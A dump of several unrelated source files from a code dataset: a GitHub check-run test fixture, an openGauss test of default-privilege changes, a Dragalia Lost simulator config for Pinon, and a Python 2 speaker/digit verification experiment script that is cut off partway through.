create_response = json.loads("""
{
"id": 4,
"head_sha": "ce587453ced02b1526dfb4cb910479d431683101",
"node_id": "MDg6Q2hlY2tSdW40",
"external_id": "42",
"url": "https://api.github.com/repos/github/hello-world/check-runs/4",
"html_url": "http://github.com/github/hello-world/runs/4",
"details_url": "https://example.com",
"status": "in_progress",
"conclusion": null,
"started_at": "2018-05-04T01:14:52Z",
"completed_at": null,
"output": {
"title": "Mighty Readme Report",
"summary": "",
"text": ""
},
"name": "mighty_readme",
"check_suite": {
"id": 5
},
"app": {
"id": 1,
"node_id": "MDExOkludGVncmF0aW9uMQ==",
"owner": {
"login": "github",
"id": 1,
"node_id": "MDEyOk9yZ2FuaXphdGlvbjE=",
"url": "https://api.github.com/orgs/github",
"repos_url": "https://api.github.com/orgs/github/repos",
"events_url": "https://api.github.com/orgs/github/events",
"hooks_url": "https://api.github.com/orgs/github/hooks",
"issues_url": "https://api.github.com/orgs/github/issues",
"members_url": "https://api.github.com/orgs/github/members{/member}",
"avatar_url": "https://github.com/images/error/octocat_happy.gif",
"description": "A great organization"
},
"name": "Super CI",
"description": "",
"external_url": "https://example.com",
"html_url": "https://github.com/apps/super-ci",
"created_at": "2017-07-08T16:18:44-04:00",
"updated_at": "2017-07-08T16:18:44-04:00"
},
"pull_requests": []
}""")
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1666
|
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 功能测试
Case Name : 初始用户和sysadmin自己alter自己权限
Description :
1.初始用户alter自己的权限:alter不报错,但不生效,查询权限不变
1.1.初始用户alter自己的权限
1.2.清理环境 期望:清理成功
2.sysadmin用户alter自己的权限:alter不报错,但不生效,查询权限不变
2.1.管理员用户连接创建sysadmin用户 default016_01 期望:创建成功
2.2.default016_016用户连接 执行alter测试
2.3.清理 期望:清理成功
备注:以上alter测试包括对表(包含视图),类型,函数的权限测试
Expect :
1.初始用户alter自己的权限:alter不报错,但不生效,查询权限不变
1.1.初始用户alter自己的权限
1.2.清理环境 期望:清理成功
2.sysadmin用户alter自己的权限:alter不报错,但不生效,查询权限不变
2.1.管理员用户连接创建sysadmin用户 default016_01 期望:创建成功
2.2.default016_016用户连接 执行alter测试
2.3.清理 期望:清理成功
备注:以上alter测试包括对表(包含视图),类型,函数的权限测试
History :
"""
import sys
import unittest
from yat.test import macro
from yat.test import Node
sys.path.append(sys.path[0] + "/../")
from testcase.utils.Logger import Logger
from testcase.utils.Constant import Constant
from testcase.utils.CommonSH import CommonSH
logger = Logger()
commonsh = CommonSH('dbuser')
class Privategrant(unittest.TestCase):
def setUp(self):
logger.info('--------Opengauss_Function_Alter_Default_Privileges_Case0016开始执行--------')
self.userNode = Node('dbuser')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.Constant = Constant()
# 初始用户用户名
self.username = self.userNode.ssh_user
# 初始用户密码
self.password = <PASSWORD>
def test_common_user_permission(self):
logger.info('--------1.初始用户alter自己的权限--------')
logger.info('--------1.1.初始用户alter自己的权限--------')
sql_cmd = (f'''
drop schema if exists schema_016 cascade;
create schema schema_016;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 GRANT ALL PRIVILEGES on tables to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} GRANT select,insert,update,truncate,references,TRIGGER,DELETE on tables to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 GRANT ALL PRIVILEGES on functions to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} GRANT EXECUTE on functions to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 GRANT ALL PRIVILEGES on TYPES to {self.username} WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role {self.username} GRANT USAGE on TYPES to {self.username} WITH GRANT OPTION ;
drop schema if exists schema_016 cascade;
create schema schema_016;
drop table if exists test_alter_default_016 cascade;
create table test_alter_default_016(id int unique);
select * from test_alter_default_016;
drop function if exists test_default_016(int) cascade;
create or replace function test_default_016(a int) return int
as
b int:= a;
begin
for i in 1..a loop
b:=b+1;
end loop;
return b;
end;
select test_default_016(16);
drop type if exists type016;
CREATE TYPE type016 AS (c_int int,c_text text);
drop table if exists test_alter_default_016 cascade;
create table test_alter_default_016(id type016);
select * from test_alter_default_016;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 revoke ALL on tables from {self.username} CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role {self.username} revoke select,insert,update,truncate,references,TRIGGER,DELETE on tables from {self.username} CASCADE CONSTRAINTS;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 revoke ALL on functions from {self.username} CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role {self.username} revoke EXECUTE on functions from {self.username} CASCADE CONSTRAINTS;
ALTER DEFAULT PRIVILEGES for role {self.username} in schema schema_016 revoke ALL on TYPES from {self.username} CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role {self.username} revoke USAGE on TYPES from {self.username} CASCADE CONSTRAINTS;
''')
excute_cmd = f'''
source {self.DB_ENV_PATH};
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -U {self.username} -W {self.password} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], msg)
self.assertIn(self.Constant.ALTER_DEFAULT_PRIVILEGES, msg)
logger.info('--------1.2.清理环境--------')
sql_cmd = ('''
drop table if exists test_alter_default_016 cascade;
drop type if exists type016 cascade;
drop function if exists test_default_016(int) cascade;
drop schema if exists schema_016 cascade;
''')
excute_cmd = f'''
source {self.DB_ENV_PATH};
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -U {self.username} -W {self.password} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], msg)
logger.info('--------2.sysadmin用户alter自己的权限--------')
logger.info('--------2.1.管理员用户连接创建sysadmin用户 default016_01 --------')
sql_cmd = commonsh.execut_db_sql(f'''
drop owned by default016_01 cascade;
drop user if exists default016_01;
create user default016_01 password '{<PASSWORD>}';
grant all privileges to default016_01;
''')
logger.info(sql_cmd)
self.assertIn(self.Constant.CREATE_ROLE_SUCCESS_MSG, sql_cmd)
logger.info('--------2.2.default016_01用户连接 执行alter测试--------')
sql_cmd = (f'''
drop schema if exists schema_016 cascade;
create schema schema_016;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 GRANT ALL PRIVILEGES on tables to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 GRANT select,insert,update,truncate,references,TRIGGER,DELETE on tables to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 GRANT ALL PRIVILEGES on functions to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 GRANT EXECUTE on functions to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 GRANT ALL PRIVILEGES on TYPES to default016_01 WITH GRANT OPTION ;
ALTER DEFAULT PRIVILEGES for role default016_01 GRANT USAGE on TYPES to default016_01 WITH GRANT OPTION ;
drop schema if exists schema_016 cascade;
create schema schema_016;
drop table if exists test_alter_default_016 cascade;
create table test_alter_default_016(id int unique);
select * from test_alter_default_016;
drop function if exists test_default_016(int) cascade;
create or replace function test_default_016(a int) return int
as
b int:= a;
begin
for i in 1..a loop
b:=b+1;
end loop;
return b;
end;
select test_default_016(16);
drop type if exists type016;
CREATE TYPE type016 AS (c_int int,c_text text);
drop table if exists test_alter_default_016 cascade;
create table test_alter_default_016(id type016);
select * from test_alter_default_016;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 revoke ALL on tables from default016_01 CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role default016_01 revoke select,insert,update,truncate,references,TRIGGER,DELETE on tables from default016_01 CASCADE CONSTRAINTS;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 revoke ALL on functions from default016_01 CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role default016_01 revoke EXECUTE on functions from default016_01 CASCADE CONSTRAINTS;
ALTER DEFAULT PRIVILEGES for role default016_01 in schema schema_016 revoke ALL on TYPES from default016_01 CASCADE CONSTRAINTS ;
ALTER DEFAULT PRIVILEGES for role default016_01 revoke USAGE on TYPES from default016_01 CASCADE CONSTRAINTS;
''')
excute_cmd = f'''
source {self.DB_ENV_PATH};
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -U default016_01 -W {macro.COMMON_PASSWD} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], msg)
self.assertIn(self.Constant.ALTER_DEFAULT_PRIVILEGES, msg)
logger.info('--------2.3.清理--------')
sql_cmd = commonsh.execut_db_sql(f'''
drop owned by default016_01 cascade;
drop user if exists default016_01;
''')
logger.info(sql_cmd)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], sql_cmd)
def tearDown(self):
logger.info('----------------------------------清理环境----------------------------------')
sql_cmd = commonsh.execut_db_sql('''
drop owned by default016_01 cascade;
drop user if exists default016_01;
''')
logger.info(sql_cmd)
logger.info('--------Opengauss_Function_Alter_Default_Privileges_Case0016执行结束--------')
|
StarcoderdataPython
|
188425
|
<filename>adv/pinon.py
from core.advbase import *
from module.template import SigilAdv
def module():
return Pinon
class Pinon(SigilAdv):
conf = {}
conf['slots.a'] = ['Primal_Crisis', 'His_Clever_Brother']
conf['slots.d'] = 'Dragonyule_Jeanne'
conf['acl'] = """
# `dragon(c3-s-end), s
`s3, not buff(s3)
if self.unlocked
if x=8 or fsc
`s2
`s4
`s1, self.energy()>=5
end
else
if fsc
`s2
`s4
`s1
`dodge
end
`fs2
end
"""
conf['coabs'] = ['Dagger2', 'Axe2', 'Xander']
conf['share'] = ['Gala_Elisanne']
def fs2_proc(self, e):
self.a_update_sigil(-13)
def prerun(self):
self.config_sigil(duration=300, x=True)
def x(self):
x_min = 1
prev = self.action.getprev()
if self.unlocked and isinstance(prev, X) and prev.index >= 5:
x_min = 8
return super().x(x_min=x_min)
def post_run(self, end):
if self.unlocked:
self.comment += f'unlock at {self.unlocked:.02f}s; only s1 if energized after unlock'
else:
self.comment += f'not unlocked'
if __name__ == '__main__':
from core.simulate import test_with_argv
test_with_argv(None, *sys.argv)
|
StarcoderdataPython
|
1743967
|
import pandas as pd #for pandas see http://keisanbutsuriya.hateblo.jp/entry/201\
import argparse
import numpy as np
import math
import subprocess
import glob
import mylib
import time
import datetime
import sys
import os
# main
def myshell(cmd): #no stop even when error occured
try:
retcode=subprocess.Popen(cmd, shell=True)
if retcode < 0:
print "my Child was terminated by signal", -retcode
else:
pass
# print "my Child returned", retcode
except OSError as e:
print "Execution failed:", cmd, e
return retcode.wait()
def m_st(i_s,i_t): #
if verif=="s":
return i_s #for speaker recog
else:
return i_t #for speaker recog
#old#def vrv2_f(f): # old
#old# fl=f.split('-')
#old# import pdb;pdb.set_trace(); #for debug
#old## MFCC f=mnh-go1-R1-sCns120.dat #2210617
#old## LPCSE f=mnh-go1-R1-sCns120.dat #2210617
#old## CAN2 f=mnh-go1-R1-pP1F2x23G3x0.5m0.dat
#old# if fl[-2][0]=='C': #LPC #mnh-go1-R1-MFCCl20m20n22E1.dat
#old# if verif=="s": #speaker
#old# v=fl[0]
#old# if len(fl)==5: #e.g. mnh-ni7-R1-Ck50l20-FDsCns90ls10.dat
#old# r='1'
#old# v2=v #-> mnh-ni7-R1-Ck50l20-FDsCns90ls10.dat
#old# elif len(fl)==7:
#old# r=fl[4][1:]
#old# v2=fl[2]
#old# else:# if verif=="t": #text
#old# v=fl[1][:-1] if fl[1][-2].isdigit()==False else fl[1][:-2]
#old# if len(fl)==5:#e.g. mym-kyu10-R1-p.dat
#old# r='1'
#old# v2=v
#old# elif len(fl)==7:
#old# r=fl[4][1:]
#old# v2=fl[3][:-1] if fl[3][-2].isdigit()==False else fl[3][:-2]
#old#
#old# else:#pole-distribution
#old# if verif=="s": #speaker
#old# v=fl[0]
#old# if len(fl)==4:#e.g. mym-kyu10-R1-p.dat
#old# r='1'
#old# v2=v
#old# elif len(fl)==6: #e.g. ['fms', 'si9', 'R0.8', 'mkk', 'kyu1', 20201224
#old## elif len(fl)==6: #e.g. ['fms', 'si9', 'R0.8', 'mkk', 'kyu1', 'pP1F2x23G3x0.5m0.dat']fhs-go1-mmt-nana10-R0.8-p.dat -> fms-ni2-R0.8-mmt-san4-pP1.dat
#old# r=fl[2][1:]
#old# v2=fl[3] #-> fhs-go1-mmt-nana10-R0.8-p.dat -> fms-ni2-R0.8-mmt-san4-pP1.dat
#old# #20200910? s2=fl[3] #-> fhs-go1-mmt-nana10-R0.8-p.dat -> fms-ni2-R0.8-mmt-san4-pP1.dat
#old# else:#verif=t text
#old# v=fl[1][:-1] if fl[1][-2].isdigit()==False else fl[1][:-2]
#old# if len(fl)==4:#e.g. mym-kyu10-R1-p.dat
#old# r='1'
#old# v2=v
#old# elif len(fl)==6: #e.g. fhs-go1-mmt-nana10-R0.8-pP1F4x24G3x0.5m0.dat
#old# r=fl[4][1:]
#old# v2=fl[3][:-1] if fl[3][-2].isdigit()==False else fl[3][:-2]
#old# #20200910? s2=fl[3] #-> fhs-go1-mmt-nana10-R0.8-p.dat -> fms-ni2-R0.8-mmt-san4-pP1.dat
#old# return v,r,v2
def vrv2_f(f): # new 20210617
fl=f.split('-')
# MFCC f=mnh-go1-R1-sCns120.dat #20210617
# LPCSE f=mnh-go1-R1-sCns120.dat #20210617
# CAN2 f=mnh-go1-R1-pP1F2x23G3x0.5m0.dat
# y=fhs-zero1-R0.8-mko-go7.dat
# import pdb;pdb.set_trace(); #for debug
if verif=="s": #speaker verification
v=fl[0]
# import pdb;pdb.set_trace(); #for debug
if fl[3]=='R1':#e.g. mym-kyu10-R1-p.dat
r='1'
v2=fl[0] #-> mnh-ni7-R1-Ck50l20-FDsCns90ls10.dat
else:#R=0.8, ...
r=fl[2][1:]
v2=fl[3] # y=fhs-zero1-R0.8-mko-go7.dat
else:# if verif=="t": #text verification
if fl[3]=='R1':#e.g. mym-kyu10-R1-p.dat
r='1'
v2=v=fl[1][:-1] if fl[1][-2].isdigit()==False else fl[1][:-2]
else:
r=fl[3][1:] # y=fhs-zero1-R0.8-mko-go7.dat
v2=fl[4][:-1] if fl[4][-2].isdigit()==False else fl[4][:-2]
return v,r,v2
if __name__ == "__main__":
#oob4speakerdigit+sX_2018 sp:fhs:fms tx:zero:ichi ntxi:9 k:36 mbas:$mbas dir:$dir1 dir2:$dir2 s:-1 N:${N} sX:${sX}
#oob4speakerdigit+ sp:fhs:fms:mkk:mko:mmt:mnh:mym tx:zero:ichi:ni:san:yon:go:roku:nana:hachi:kyu ntxi:10 k:36 mbas:2:300:1.6:1 dir:$dira s:-1 N:40
parser = argparse.ArgumentParser(description='speech normalize')
parser.add_argument('-ntxi', default=10, type=int, help='number of texts')
parser.add_argument('-k', default=36, type=int, help='embedding dimensionk')
parser.add_argument('-N', default=40, type=int, help='number of units for verification')
parser.add_argument('-mbas', default='2:300:1.6:1', type=str, help='mbas:2:nbag:bagsize_ratio:1')
parser.add_argument('-s', default=0, type=int, help='-1 for all speaker verification')
parser.add_argument('-d', default=0, type=int, help='-1 for all digit verification')
parser.add_argument('-sd', default='', type=str, help='s and d, respectively, for speaker and digit verification')
parser.add_argument('-w', default=0, type=int, help='-1 for all digit (word) verification')
parser.add_argument('-sX', default=-1, type=int, help='excluded speaker')
parser.add_argument('-dr', default='.', type=str, help='directory of training data')
parser.add_argument('-R', default='0.8', type=str, help='mag r1:r2:...:rn for learning and test')
parser.add_argument('-RX', default='0', type=str, help='mag r1:r2:...:rn for test')
parser.add_argument('-FD', default='pP1', type=str, help='Features of data')
# parser.add_argument('-FD', default='pP1', type=str, choices=['pP1','pPc','pPcb','rP1','rPc','rPcb','s','S','sR','SR','SC','sC'],help='Features of data')
# parser.add_argument('-kl', default='k20l20', type=str, help='k:LPC dimension, fl flame-length[ms] ')
parser.add_argument('-nr', default=2, type=int, help='number of divisions for magnitude-axis in pole space')
parser.add_argument('-na', default=18, type=int, help='number of divisions for angle-axis in pole space')
parser.add_argument('-ns', default=100, type=int, help='number of divisions for spectrum envelope')
parser.add_argument('-ls', default='00', type=str, help='use log-scale or not, 10: log before mean, 01 log after mean, 00 no-log')
parser.add_argument('-lx', default='0', type=str, help='use log-scale or not, 1: log , 0 no-log')
# parser.add_argument('-ls', default=1, type=int, help='use log-scale or not')
parser.add_argument('-nx', default=7, type=int, help='number of divisions on x-axis in pole space')
parser.add_argument('-nG', default=13, type=int, help='Gaussian Kernel size')
parser.add_argument('-sG', default=2, type=float, help='Gaussian Kernel sigma')
parser.add_argument('-OmL', default='0', type=str, help='Omit Learning')
parser.add_argument('-ow', default=1, type=int, help='Overwite files if ow=1, omit otherwise.')
parser.add_argument('-mel', default=0, type=int, help='1 for use mel frequency.')
parser.add_argument('-DISP', default='1', type=str, help='DISP[0]==1 to make files, DISP[1]==1 to display')
parser.add_argument('-nlz', default='1', type=str, choices=['max','norm','1','none'], help='normalize by norm, max, 1')
parser.add_argument('-fnerr', default='mmt-san2:fhs-hachi5', type=str, help='files lacking data')
parser.add_argument('-AF', default='_', type=str, help='AF=(dr/FDext) of Additional Features for training')
parser.add_argument('-AFcut', default='', type=str, help='ex. -AFcut 23-46:0-1')
parser.add_argument('-method', default='CAN2,8,50,2:0.7:1:20', type=str, help='method for making M or s')
parser.add_argument('-sp', default='fhs:fms:mkk:mko:mmt:mnh:mym', type=str, help='speaker')
parser.add_argument('-tx', default='zero:ichi:ni:san:si:go:roku:nana:hachi:kyu', type=str, help='text')
parser.add_argument('-S', default='fhs:fms:mkk:mko:mmt:mnh:mym', type=str, help='speaker')
parser.add_argument('-D', default='zero:ichi:ni:san:si:go:roku:nana:hachi:kyu', type=str, help='text')
parser.add_argument('-L', default='1:2:3:4:5:6:7:8:9', type=str, help='datetime index')
# parser.add_argument('-drFD2', default='', type=str, help='drFD2(dr/FDext) of Additional Features for training ')
# parser.add_argument('-fn4AF', default='', type=str, help='fn4 Additional Features for training')
np.random.seed(seed=32)
args = parser.parse_args()
S=(args.sp).split(':') #speakers
T=(args.tx).split(':') #text
S=(args.S).split(':') #speakers
D=(args.D).split(':') #speakers
L=(args.L).split(':') #speakers
R=(args.R).split(':') #lamgda:SN ratio
RX=(args.RX).split(':') #lambda:SN ratio for test
L=(args.L).split(':') #text
sX=args.sX
dr=args.dr
nr=args.nr
na=args.na
nx=args.nx
nG=args.nG
sG=args.sG
# FD=(args.FD).split('_')
FD=args.FD
mel=args.mel
N=args.N
DISP=args.DISP+'00000'
# L=range(1,args.ntxi+1) #date
_mbas=map(float,(args.mbas).split(':'))
mbas=[]
mbas.append(int(_mbas[0]))
mbas.append(int(_mbas[1]))
mbas.append(float(_mbas[2]))
mbas.append(int(_mbas[3]))
b=mbas[1] #method,b,a,seed=map(int,(args.mbas).split(':'))
fntrain_check=0 #for check target to debug
fnerr=(args.fnerr).split(':') #fnerr=['mmt-san2', 'fhs-hachi5']
if args.s != 0:# speaker-verification
M=S
V=S
verif="s"
elif args.d != 0: #digit(text)-verification
M=T
V=T
verif="t"
if args.sd =='s':
M=S
V=S
verif="s"
elif args.sd =='d':
M=T
V=T
verif="t"
else:pass
# import pdb;pdb.set_trace(); #for debug
# fnr=args.dir+'/speaker-verif-result-R{}{}.dat'.format(args.R,args.FD)
# if nRX>0: fnrX=args.dir+'/speaker-verif-result-X-R{}{}.dat'.format(args.R,args.FD)
method=(args.method).split(',')
if method[0][:4]=='MFCC':
l,m,n,E,N=method[1:][0:5] #method=MFCC,${l},${n_MFCC},${n_MFCCFB},${E_MFCC}
E_MFCC=int(E)
FD=''
FDext='MFCC' # FDext='{}F{}'.format(FD,nx)
FDextr='MFCCl{}m{}n{}E{}N{}b{}a{}R{}'.format(l,m,n,E,N,b,_mbas[2],args.R) # FDext='{}F{}'.format(FD,nx)
# import pdb;pdb.set_trace(); #for debug
elif method[0][:6]=='LPCSE1':#new20210818
k,l,n,N=map(int,method[1:][0:4])
FDext='SE' # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
FDextr='SEk{}l{}n{}N{}b{}a{}R{}'.format(k,l,n,N,b,_mbas[2],args.R) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
elif method[0][:7]=='LPCSPTK':#new20210818
# k,l,ns,N=map(int,method[1:][0:5])
k,l,n,w=map(int,method[1:][0:4])
FDext='SE' # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
FDextr='SEk{}l{}n{}w{}N{}b{}a{}R{}'.format(k,l,n,w,N,b,_mbas[2],args.R) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
# FDextr='SEk{}l{}f{}w{}'.format(k,l,f,w) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
elif method[0][:6]=='LPCSE1':
k,l,ns,N=map(int,method[1:][0:5])
FDext='LPCSE1' # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
FDextr='LPCSE1k{}l{}n{}N{}b{}a{}R{}'.format(k,l,ns,N,b,_mbas[2],args.R) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
elif method[0]=='N':
N=int(method[1])
FDext='N' # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
FDextr='N{}'.format(N) #
else:
if method[0][:6]=='LPC+SE':
k,l,FD,ns=method[1:][0:4]
mname='LPC+SE'
# FDex='LPC+SE'.format(k,l,FD,ns) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
# FDextr='LPC+SEk{}l{}FD{}ns{}'.format(k,l,FD,ns) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
# FDext='{}ns{}'.format(FD,ns) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
elif method[0][:7]=='CAN2+PD':
# import pdb;pdb.set_trace(); #for debug
k1,N1,a1,b1,s1,FD,nr,na,nG,sG,mel,N,a,b,s=method[1:][0:15]
rsa='2:{}:{}:{}'.format(a,s,b)
# k,N,rsa,nr,na,nG,sG,mel=method[1:][0:8]
mname='CAN2+PD'
# FDext='{}F{}x{}G{}x{}m{}'.format(FD,nr,na,nG,sG,mel) # FDext='{}F{}x{}'.format(FD,nr,na)
# # FDext='CAN2+PDk{}N{}rsa{}nr{}na{}nG{}mel{}'.format(k,N,rsa,nr,na,nG,sG,melFD,nr,na,nG,sG,mel) # FDext='{}F{}x{}'.format(FD,nr,na)
# FDextr='CAN2+PDk{}N{}rsa{}nr{}na{}nG{}mel{}'.format(k,N,rsa,nr,na,nG,sG,melFD,nr,na,nG,sG,mel) # FDext='{}F{}x{}'.format(FD,nr,na)
# FDextr='{}N{}a{}b{}{}N{}R{}'.format(mname,N1,a1,b1,FDext,N,b,_mbas[2],args.R)
if FD[0]=='r':
FDext='{}F{}G{}x{}'.format(FD,nx,nG,sG) # FDext='{}F{}'.format(FD,nx)
elif FD[0]=='p':
FDext='{}F{}x{}G{}x{}m{}'.format(FD,nr,na,nG,sG,mel) # FDext='{}F{}x{}'.format(FD,nr,na)
elif FD[0] in ('s', 'S'):
FDext='{}ns{}ls{}'.format(FD,args.ns,args.ls) # FDext='{}F{}x{}'.format(FD,nr,na)#20210616
# elif FD[0] in ('s', 'S','sR', 'SR'):
# FDext='FD{}ns{}ls{}'.format(FD,args.ns,args.ls) # FDext='{}F{}x{}'.format(FD,nr,na)
else:pass
if method[0][:7]=='CAN2+PD':
FDextr='{}N{}a{}b{}{}N{}R{}'.format(mname,N1,a1,b1,FDext,N,b,_mbas[2],args.R)
# FDextr='{}{}N{}b{}a{}R{}'.format(mname,FDext,N,b,_mbas[2],args.R)
else:
FDextr='{}{}N{}R{}'.format(mname,FDext,N,b,_mbas[2],args.R)
fnr='{}/result-R{}{}.dat'.format(dr,args.R,FDextr)
nRX=len(RX) if RX[0]!='0' else 0
if nRX>0: fnrX='{}/resultX-R{}{}.dat'.format(dr,args.R,FDextr)
fpr=open(fnr,'w')
if nRX>0: fprX=open(fnrX,'w')
nS=len(S)
nL=len(L)
nT=len(T)
# import pdb;pdb.set_trace(); #for debug
argv=sys.argv
cmd=''
for a in argv:# for i,a in enumerate(argv):
cmd+=a+' '
# print('#start:python {}'.format(cmd))
cmd0=cmd
start_time=time.time()
print('#start time:{}'.format(datetime.datetime.now()))
# import pdb;pdb.set_trace(); #for debug
AF=[]
if args.AF != '_' and args.AF != 'q':
aAF=(args.AF).split(':') # aAF=trainingFile,weight,del0-del1
for i in range(0,len(aAF)): #
aAFi=aAF[i].split(',')
# import pdb;pdb.set_trace(); #for debug
if len(aAFi)>=3:
aAFdel=aAFi[2].split('-')
if aAFdel[0]=='':
AFdel=''
elif len(aAFdel)==1:
AFdel=[int(aAFdel[0]),int(aAFdel[0])+1]
elif len(aAFdel)==2:
AFdel=[int(aAFdel[0]),int(aAFdel[1])]
else:
AFdel=''
AF.append([os.path.expanduser(aAFi[0]),float(aAFi[1]),AFdel])
elif len(aAFi)>=2:
AF.append([os.path.expanduser(aAFi[0]),float(aAFi[1]),''])
else:
AF.append([os.path.expanduser(aAFi[0]),1,''])
# aAFcut=args.AFcut.split(':') #-AFcut 23-46:0:0
# AFcut={}
# for i in range(0,len(aAFcut)):
# AFcuti=aAFcut[i].split('-')
# if AFcuti[0]=='':
# AFcut[i]=''
# elif len(AFcuti)==1:
# AFcut[i]=[int(AFcuti[0]),int(AFcuti[0])+1]
# elif len(AFcuti)==2:
# AFcut[i]=[int(AFcuti[0]),int(AFcuti[1])]
# else:
# AFcut[i]=''
# for i in range(len(aAFcut),len(AF)):
# AFcut[i]=''
# import pdb;pdb.set_trace(); #for debug
# import pdb;pdb.set_trace(); #for debug
if len(AF)>0:
# if args.AF != '_' and args.AF != 'q':
fbtrain='train_xy'
# AF=map(os.path.expanduser,(args.AF).split(':'))
# import pdb;pdb.set_trace(); #for debug
## FtrainAF=np.array(pd.read_csv(AF[0],delim_whitespace=True,dtype=np.float64,header=None))[:,:-1]
## import pdb;pdb.set_trace(); #for debug
## if AFcut[0]!='':
## FtrainAF=np.delete(FtrainAF,range(AFcut[0][0],AFcut[0][1]),1)
# FtrainAF=np.array(pd.read_csv('{}'.format(AF[0]),delim_whitespace=True,dtype=np.float64,header=None))[:,:-1]
for i in range(0,len(AF)):
FtrainAF1=np.array(pd.read_csv(AF[i][0],delim_whitespace=True,dtype=np.float64,header=None))[:,:-1]
if AF[i][2]!='': FtrainAF1=np.delete(FtrainAF1,range(AF[i][2][0],AF[i][2][1]),1)
# import pdb;pdb.set_trace(); #for debug
# FtrainAF1=FtrainAF1*AF[i][1]
if AF[i][1]>=0:
FtrainAF1=FtrainAF1*AF[i][1]
else:
for j in range(0,len(FtrainAF1)):
FtrainAF1[j]=FtrainAF1[j]*(-AF[i][1])/np.linalg.norm(FtrainAF1[j])
# FtrainAF1[j]=FtrainAF1[j]*AF[i][1]
# FtrainAF1[i]=FtrainAF1[i]*AF[i][1]/np.linalg.norm(FtrainAF1[i])
# FtrainAF1=np.array(pd.read_csv('{}'.format(AF[i]),delim_whitespace=True,dtype=np.float64,header=None))[:,:-1]
# import pdb;pdb.set_trace(); #for debug
if i==0:
FtrainAF=FtrainAF1
else:
FtrainAF=np.concatenate([FtrainAF,FtrainAF1],axis=1)
#
for i_m,m in enumerate(M):#machine
if args.ow == 1:
mylib.myshell('make data-clean;mkdir -p tmp')
else:
print('#No data-cleaned because -ow 0')
fbtrain='train_xy'
fbtest='test_xy'
fntrain='{}.dat'.format(fbtrain)
fntest='{}.dat'.format(fbtest)
fptrain=open(fntrain,'w')
fptest=open(fntest,'w')
Fall=[]
Ftrain={}
Ftest={}
ytrain=[]
# import pdb;pdb.set_trace(); #for debug
if method[0]=='N':#all oob
for i_r,r in enumerate(R):
for i_v,v in enumerate(V):
Ftrain[(v,r)]=['{}-{}{}-R{}-Fdummy.dat'.format(v,d,l,r) for d in D for l in L]
# import pdb;pdb.set_trace(); #for debug
elif nRX==0:#all oob
for i_r,r in enumerate(R):
for i_v,v in enumerate(V):
fnq='{}/*{}*-R{}*-{}.dat'.format(dr,v,r,FDext) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
# fnq='{}/{}-*R{}*{}.dat'.format(dr,s,r,FDext) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
F=[f.split('/')[-1] for f in glob.glob(fnq)] #file list
if len(F)==0:
print '#No files for {}'.format(fnq)
quit()
F.sort()
np.random.seed(seed=32)
Fp=np.random.permutation(F)
# Fp=F
Ftrain[(v,r)]=Fp[:]
# import pdb;pdb.set_trace(); #for debug
if len(F)==0:
print('###########No files with {}'.format(fnq))
import pdb;pdb.set_trace(); #for debug
# import pdb;pdb.set_trace(); #for debug
###############
else:
for i_r,r in enumerate(R):
